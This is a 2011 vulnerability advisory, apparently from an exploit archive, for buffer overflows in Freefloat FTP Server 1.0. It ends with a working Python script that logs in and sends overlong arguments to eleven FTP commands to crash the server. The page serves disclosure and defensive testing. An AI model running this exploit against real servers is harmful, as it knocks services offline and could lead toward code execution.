Freefloat FTP Server 1.0 Buffer Overflow

Freefloat FTP Server 1.0 Buffer Overflow: Posted Aug 5, 2011; Authored by Veerendra G.G | Site secpod.com; Freefloat FTP server version 1.0 suffers from multiple buffer overflow vulnerabilities. Proof of concept exploit is attached to the bottom of this advisory.; tags | exploit, overflow, vulnerability, proof of concept; SHA-256 | 4e6acc80e048e44fedd23cff173f1820cdf3d05c9a7ddb5986f6acdceaa74c2f; Download | Favorite | View

Freefloat FTP Server 1.0 Buffer Overflow

###############################################################################
Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities

SecPod Technologies (www.secpod.com)
Author: Veerendra G.G
###############################################################################

SecPod ID: 1019          19/07/2011 Issue Discovered
            19/07/2011 Vendor Notified
            No Response From Vendor
            04/08/2011 Advisory Released
                 

Class: Buffer Overflow        Severity: High


Overview:
---------
Freefloat FTP Server Version 1.0 is prone to multiple Commands Buffer Overflow
vulnerabilities.


Technical Description:
----------------------
The flaws are caused due to input validation errors while processing DELE,
MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. These
can be exploited by sending an overly long command argument causing the
buffer to overflow.


Impact:
--------
Successful exploitation may allow remote attackers to execute arbitrary code
or cause a denial of service condition.


Affected Software:
------------------
Freefloat FTP Server Version 1.0


Tested on:
-----------
Freefloat FTP Server Version 1.0 on Windows XP SP3 En.


References:
-----------
http://secpod.org/blog/?p=310
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php


Proof of Concept:
----------------
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
 
(or see below)



Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report: 
        ACCESS_VECTOR          = NETWORK 
        ACCESS_COMPLEXITY      = LOW 
        AUTHENTICATION         = SINGLE INSTANCE 
        CONFIDENTIALITY_IMPACT = PARTIAL 
        INTEGRITY_IMPACT       = PARTIAL 
        AVAILABILITY_IMPACT    = COMPLETE 
        EXPLOITABILITY         = PROOF_OF_CONCEPT 
        REMEDIATION_LEVEL      = UNAVAILABLE 
        REPORT_CONFIDENCE      = CONFIRMED 
        CVSS Base Score        = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C) 
        CVSS Temporal Score    = 7.2 
        Risk factor            = High 
   

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.


============================================================


#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket


def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : " , HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)

    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)

    tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n")
    tcp_sock.close()


if __name__ == "__main__":

    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR",
            "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Freefloat FTP Server 1.0 Buffer Overflow

Freefloat FTP Server 1.0 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Freefloat FTP Server 1.0 Buffer Overflow

Share This

Freefloat FTP Server 1.0 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems